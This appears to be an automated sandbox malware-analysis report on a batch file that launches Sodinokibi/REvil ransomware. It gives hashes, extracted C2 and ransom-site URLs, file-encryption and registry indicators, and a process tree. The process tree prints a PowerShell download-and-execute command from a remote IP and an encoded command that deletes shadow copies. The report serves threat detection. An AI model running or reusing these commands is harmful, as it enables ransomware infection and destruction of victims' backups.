Analysis
-
max time kernel
149s -
max time network
155s -
platform
windows7_x64 -
resource
win7v191014 -
submitted
11-02-2020 20:10
Static task
static1
Behavioral task
behavioral1
Sample
eEqGBFWD.bat
Resource
win7v191014
Behavioral task
behavioral2
Sample
eEqGBFWD.bat
Resource
win10v191014
General
-
Target
eEqGBFWD.bat
-
Size
194B
-
MD5
5921814fde0e9a996f0dee5a45a865c9
-
SHA1
946b9d4f1081b053f9b90544dcc83367e7cfbc21
-
SHA256
bf894d6ef5402e0c90fd5cfc08bd271dc601d90abdf0f73bc8c17e5a2861918b
-
SHA512
5f953ff30984392246fde646a900d5d91eb93f64345da39fc91007c67e913ce5b7ea8f59a5e572de72fa1052877a1eb7082fc67a31f9f4f118dd40db88e33763
Malware Config
Extracted
http://185.103.242.78/pastes/eEqGBFWD
Extracted
C:\mcibkq8-readme.txt
sodinokibi
http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/FB3A92CAF2834034
http://decryptor.cc/FB3A92CAF2834034
Signatures
-
Drops file in Program Files directory 33 IoCs
Processes:
powershell.exedescription ioc process File renamed C:\Program Files\DebugRevoke.txt => \??\c:\program files\DebugRevoke.txt.mcibkq8 powershell.exe File opened for modification \??\c:\program files\MountBlock.xltx powershell.exe File renamed C:\Program Files\JoinMove.vbs => \??\c:\program files\JoinMove.vbs.mcibkq8 powershell.exe File renamed C:\Program Files\WaitDebug.mhtml => \??\c:\program files\WaitDebug.mhtml.mcibkq8 powershell.exe File opened for modification \??\c:\program files\StepConnect.temp powershell.exe File renamed C:\Program Files\UseSkip.xps => \??\c:\program files\UseSkip.xps.mcibkq8 powershell.exe File renamed C:\Program Files\StepConnect.temp => \??\c:\program files\StepConnect.temp.mcibkq8 powershell.exe File created \??\c:\program files (x86)\mcibkq8-readme.txt powershell.exe File renamed C:\Program Files\MountBlock.xltx => \??\c:\program files\MountBlock.xltx.mcibkq8 powershell.exe File created \??\c:\program files\microsoft sql server compact edition\v3.5\mcibkq8-readme.txt powershell.exe File created \??\c:\program files\mcibkq8-readme.txt powershell.exe File opened for modification \??\c:\program files\ConfirmUpdate.mpeg2 powershell.exe File opened for modification \??\c:\program files\PushFormat.jpe powershell.exe File renamed C:\Program Files\ConvertFromGet.xla => \??\c:\program files\ConvertFromGet.xla.mcibkq8 powershell.exe File renamed C:\Program Files\RegisterJoin.vsd => \??\c:\program files\RegisterJoin.vsd.mcibkq8 powershell.exe File opened for modification \??\c:\program files\WaitDebug.mhtml powershell.exe File renamed C:\Program Files\ConfirmUpdate.mpeg2 => \??\c:\program files\ConfirmUpdate.mpeg2.mcibkq8 powershell.exe File opened for modification \??\c:\program files\UnregisterEnable.ods powershell.exe File renamed C:\Program Files\UnprotectWait.html => \??\c:\program files\UnprotectWait.html.mcibkq8 powershell.exe File renamed C:\Program Files\PushFormat.jpe => \??\c:\program files\PushFormat.jpe.mcibkq8 powershell.exe File created \??\c:\program files\microsoft sql server compact edition\v3.5\desktop\mcibkq8-readme.txt powershell.exe File opened for modification \??\c:\program files\DebugRevoke.txt powershell.exe File opened for modification \??\c:\program files\JoinMove.vbs powershell.exe File opened for modification \??\c:\program files\PublishCopy.ppt powershell.exe File opened for modification \??\c:\program files\RegisterJoin.vsd powershell.exe File opened for modification \??\c:\program files\UnprotectWait.html powershell.exe File renamed C:\Program Files\UnregisterEnable.ods => \??\c:\program files\UnregisterEnable.ods.mcibkq8 powershell.exe File opened for modification \??\c:\program files\UseSkip.xps powershell.exe File opened for modification \??\c:\program files\ConvertFromGet.xla powershell.exe File opened for modification \??\c:\program files\ImportLimit.rm powershell.exe File renamed C:\Program Files\ImportLimit.rm => \??\c:\program files\ImportLimit.rm.mcibkq8 powershell.exe File created \??\c:\program files\microsoft sql server compact edition\mcibkq8-readme.txt powershell.exe File renamed C:\Program Files\PublishCopy.ppt => \??\c:\program files\PublishCopy.ppt.mcibkq8 powershell.exe -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
Processes:
powershell.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\w7cys.bmp" powershell.exe -
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
Processes:
powershell.exepid process 1296 powershell.exe -
Suspicious behavior: EnumeratesProcesses 5 IoCs
Processes:
powershell.exepowershell.exepid process 1296 powershell.exe 1296 powershell.exe 1296 powershell.exe 1460 powershell.exe 1460 powershell.exe -
Processes:
powershell.exedescription ioc process Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 040000000100000010000000410352dc0ff7501b16f0028eba6f45c50f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d090000000100000042000000304006082b0601050507030406082b0601050507030106082b0601050507030206082b06010505070308060a2b0601040182370a0304060a2b0601040182370a030c6200000001000000200000000687260331a72403d909f105e69bcf0d32e1bd2493ffc6d9206d11bcd67707390b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131900000001000000100000006cf252fec3e8f20996de5d4dd9aef42420000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510 powershell.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\490A7574DE870A47FE58EEF6C76BEBC60B124099 powershell.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\490A7574DE870A47FE58EEF6C76BEBC60B124099\Blob = 04000000010000001000000046a7d2fe45fb645aa859909b78449b290f000000010000002000000056db6d3c33811b6420936a9b42f80eabdb96c6f17c128ebec63e70db0b6cb77d1900000001000000100000007a6a66f56f5c2341ab447592ce0ddef9030000000100000014000000490a7574de870a47fe58eef6c76bebc60b1240991d0000000100000010000000443c22825ef037029f082f6030595f73140000000100000014000000c98077e0629282f5469cf3baf74cc3deb8a3ad396200000001000000200000009a114025197c5bb95d94e63d55cd43790847b646b23cdf11ada4a00eff15fb480b00000001000000300000004200750079007000610073007300200043006c0061007300730020003200200052006f006f0074002000430041000000090000000100000054000000305206082b0601050507030106082b0601050507030206082b0601050507030906082b0601050507030406082b06010505070308060a2b0601040182370a030406082b0601050507030606082b0601050507030720000000010000005d0500003082055930820341a003020102020102300d06092a864886f70d01010b0500304e310b3009060355040613024e4f311d301b060355040a0c14427579706173732041532d3938333136333332373120301e06035504030c174275797061737320436c617373203220526f6f74204341301e170d3130313032363038333830335a170d3430313032363038333830335a304e310b3009060355040613024e4f311d301b060355040a0c14427579706173732041532d3938333136333332373120301e06035504030c174275797061737320436c617373203220526f6f7420434130820222300d06092a864886f70d01010105000382020f003082020a0282020100d7c75ef7c107d477fb4321f4f4f569e4ee3201dba3861fe4590dbae7758352ebea1c611548bb1d07ca8caeb0dc969deac36092868228739c5606ff4b64f00c2a3749b5e5cf0c7ceef14abb733065f3d52f83b67ee3e7f59eab60f9d3f19d92748ae41c96ac5b80e9b5f43187a351fcc77ea16f8e5377d497c15533923e182f75d4ad8649cb95af54066cd806138d5bffe1261959c024ba8171799044506824945fb8b311f1294161a341cb2336d5c1f13250104e7ff48693ec84d38ebc4bbf5c014e073ddc148a940aa4ea73fb0b51e8130718fa0ef12bd154157d3ce1f7b4194267625e77e0a255ecb6d96917d53aaf44ed4ac59ee47a277ce575d7aacb25e7df6b0adb0f4d934ea8a0cd7b2ef259016ab70db807817e8b381b38e60a57993dee21e8a3f50c16dd8bec348e9c2a1c0015178d6883d2709f1808cd1168d5c96b52cdc4468fdcb5f3d857731ee9943904bfd3de38deb453ec691ca27ec48fe41b70adf2a2f9fbf7166466699f4951a2e2151867064a7fd56cb54db333e061eb5dbee9980f32d71d4b3c2e5a01529109f2dfea8dd8064063aa11e4fec3379e14523ff4e2ccf26193d1fd676bd752aebf68ab4043a057355378f053f861420764c6d76f9b4c380d63ac62af368ba2730a0df521bd74aa4dea720349dbc75f1d6263c7fddd91ec33eef56db46e3068dec8d626b0755e7bb4072098a17632b84d6c4f0203010001a3423040300f0603551d130101ff040530030101ff301d0603551d0e04160414c98077e0629282f5469cf3baf74cc3deb8a3ad39300e0603551d0f0101ff040403020106300d06092a864886f70d01010b05000382020100535f21f5bab03a52392c92b06c00c9efce20ef06f2969ee9a4747f7a16fcb7f5b6fb151b3faba6c0725d10b171eebc4fe3adac036d2e712eafc4e3ada3bd0c11a7b4ff4ab27b10101fa75741b2c0aef42c59d6471088f321512930ca6086af46ab1ded3a5bb094de44e34108a2c1ec1dd6fd4fb6d647d0140bcae6cab57b777e411f5e83c7b68c3996b03f9681416f6090e2e8f9fb2271d97db33d46bfb484af901c0f8f126aafefee1e7aae024a8a172b76feac5489242c4f3fb6b2a74e8ca89197fb29c67b5c2db9cb66b6b7a85b125185b5097e627870fea96a60b61d0e790cfdcaea248072c3973ff277ab43220ac7ebb60c84822c806b418a08c0eba56bdf9912cb8ad55e800c91e026083648c5fa381135ff25832df27abfdafd8efea5cb452c1fc48853ae770ed99a76c58e2c1da3bad5ec32aec0aaacf7d17a4debd407e248f7228eb0a49f6ace8eb2b260f4a322d023eb945a7a69dd0fbf4057ac6b5950d9a399e16efe8d0179272315de929d7b094d5ae74b48305a18e60a6de68fe0d2bbe6df7c6e2182c168394db498586662cc4a905ec3fa2704b179157499ccbead20de26601ceb5651a6a3eae4a33fa7ff61dcf15a4d6c322343eeaca8eeee4a12093c5d71c2be79fac287681d0bfd5c69cc06d09a7d54992ac9391a19af4b2a43f3635d5a58e22fe31de4a9d6d00ad09ebfd78109f1c9c7260dac981656a0 powershell.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\02FAF3E291435468607857694DF5E45B68851868 powershell.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\02FAF3E291435468607857694DF5E45B68851868\Blob = 0400000001000000100000001d3554048578b03f42424dbf20730a3f0f000000010000001400000009b9105c5bba24343ca7f341c624e183f6ee7c1b19000000010000001000000045ed9bbc5e43d3b9ecd63c060db78e5c03000000010000001400000002faf3e291435468607857694df5e45b688518681d000000010000001000000006f9583c00a763c23fb9e065a3366d55140000000100000014000000adbd987a34b426f7fac42654ef03bde024cb541a620000000100000020000000687fa451382278fff0c8b11f8d43d576671c6eb2bceab413fb83d965d06d2ff20b00000001000000260000005300650063007400690067006f0020002800410064006400540072007500730074002900000053000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b06010505070308060a2b0601040182370a030406082b0601050507030606082b0601050507030720000000010000003a040000308204363082031ea003020102020101300d06092a864886f70d0101050500306f310b300906035504061302534531143012060355040a130b416464547275737420414231263024060355040b131d41646454727573742045787465726e616c20545450204e6574776f726b312230200603550403131941646454727573742045787465726e616c20434120526f6f74301e170d3030303533303130343833385a170d3230303533303130343833385a306f310b300906035504061302534531143012060355040a130b416464547275737420414231263024060355040b131d41646454727573742045787465726e616c20545450204e6574776f726b312230200603550403131941646454727573742045787465726e616c20434120526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100b7f71a33e6f200042d39e04e5bed1fbc6c0fcdb5fa23b6cede9b113397a4294c7d939fbd4abc93ed031ae38fcfe56d505ad69729945a80b0497adb2e95fdb8cabf37382d1e3e9141ad7056c7f04f3fe8329e74cac89054e9c65f0f789d9a403c0eac61aa5e148f9e87a16a50dcd79a4eaf05b3a671949c71b350600ac7139d38078602a8e9a869261890ab4cb04f23ab3a4f84d8dfce9fe1696fbbd742d76b44e4c7adee6d415f725a710837b37965a459a09437f7002f0dc29272dad03872db14a845c45d2a7db7b4d6c4eeaccd1344b7c92bdd430025fa61b9696a582311b7a7338f567559f5cd29d746b70a2b65b6d3426f15b2b87bfbefe95d53d5345a270203010001a381dc3081d9301d0603551d0e04160414adbd987a34b426f7fac42654ef03bde024cb541a300b0603551d0f040403020106300f0603551d130101ff040530030101ff3081990603551d2304819130818e8014adbd987a34b426f7fac42654ef03bde024cb541aa173a471306f310b300906035504061302534531143012060355040a130b416464547275737420414231263024060355040b131d41646454727573742045787465726e616c20545450204e6574776f726b312230200603550403131941646454727573742045787465726e616c20434120526f6f74820101300d06092a864886f70d01010505000382010100b09be08525c2d623e20f9606929d41989cd9847981d91e5b14072336658fb0d877bbac416c47608351b0f9323de7fcf62613c78016a5bf5afc87cf787989219ae24c070a8635bcf2de51c4d296b7dc7e4eee70fd1c39eb0c0251142d8ebd16e0c1df4675e724adecf442b48593701067ba9d06354a18d32b7acc5142a17a63d1e6bba1c52bc236be130de6bd637e797ba7090d40ab6add8f8ac3f6f68c1a420551d445f59fa76221681520433c99e77cbd24d8a9911773883f561b313818b4710f9acdc80e9e8e2e1be18c9883cb1f31f1444cc604734976600fc7f8bd17806b2ee9cc4c0e5a9a790f200a2ed59e63261e559294d882175a7bd0bcc78f4e8604 powershell.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 powershell.exe -
Discovering connected drives 3 TTPs 7 IoCs
Processes:
powershell.exepowershell.execmd.exedescription ioc process File opened (read-only) \??\C: powershell.exe File opened (read-only) \??\F: powershell.exe File opened (read-only) \??\C: powershell.exe File opened (read-only) \??\A: powershell.exe File opened (read-only) \??\B: powershell.exe File opened (read-only) \??\E: powershell.exe File opened (read-only) \??\C: cmd.exe -
Modifies service 2 TTPs 4 IoCs
Processes:
vssvc.exedescription ioc process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer vssvc.exe -
Suspicious use of WriteProcessMemory 5 IoCs
Processes:
cmd.exepowershell.exedescription pid process target process PID 1100 wrote to memory of 1296 1100 cmd.exe powershell.exe PID 1296 wrote to memory of 1460 1296 powershell.exe powershell.exe PID 1296 wrote to memory of 1460 1296 powershell.exe powershell.exe PID 1296 wrote to memory of 1460 1296 powershell.exe powershell.exe PID 1296 wrote to memory of 1460 1296 powershell.exe powershell.exe -
Suspicious use of AdjustPrivilegeToken 6 IoCs
Processes:
powershell.exepowershell.exevssvc.exedescription pid process Token: SeDebugPrivilege 1296 powershell.exe Token: SeDebugPrivilege 1296 powershell.exe Token: SeDebugPrivilege 1460 powershell.exe Token: SeBackupPrivilege 1896 vssvc.exe Token: SeRestorePrivilege 1896 vssvc.exe Token: SeAuditPrivilege 1896 vssvc.exe -
Blacklisted process makes network request 11 IoCs
Processes:
powershell.exeflow pid process 7 1296 powershell.exe 9 1296 powershell.exe 14 1296 powershell.exe 16 1296 powershell.exe 20 1296 powershell.exe 24 1296 powershell.exe 26 1296 powershell.exe 28 1296 powershell.exe 30 1296 powershell.exe 31 1296 powershell.exe 33 1296 powershell.exe -
Drops file in System32 directory 1 IoCs
Processes:
powershell.exedescription ioc process File opened for modification C:\Windows\System32\CatRoot2\dberr.txt powershell.exe -
Sodin,Sodinokibi,REvil
Ransomware with advanced anti-analysis and privilege escalation functionality
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\eEqGBFWD.bat"1⤵
- Discovering connected drives
- Suspicious use of WriteProcessMemory
PID:1100 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/eEqGBFWD');Invoke-LZNYLIOOLOW;Start-Sleep -s 10000"2⤵
- Drops file in Program Files directory
- Sets desktop wallpaper using registry
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious behavior: EnumeratesProcesses
- Modifies system certificate store
- Discovering connected drives
- Suspicious use of WriteProcessMemory
- Suspicious use of AdjustPrivilegeToken
- Blacklisted process makes network request
- Drops file in System32 directory
PID:1296 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==3⤵
- Suspicious behavior: EnumeratesProcesses
- Discovering connected drives
- Suspicious use of AdjustPrivilegeToken
PID:1460
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Modifies service
- Suspicious use of AdjustPrivilegeToken
PID:1896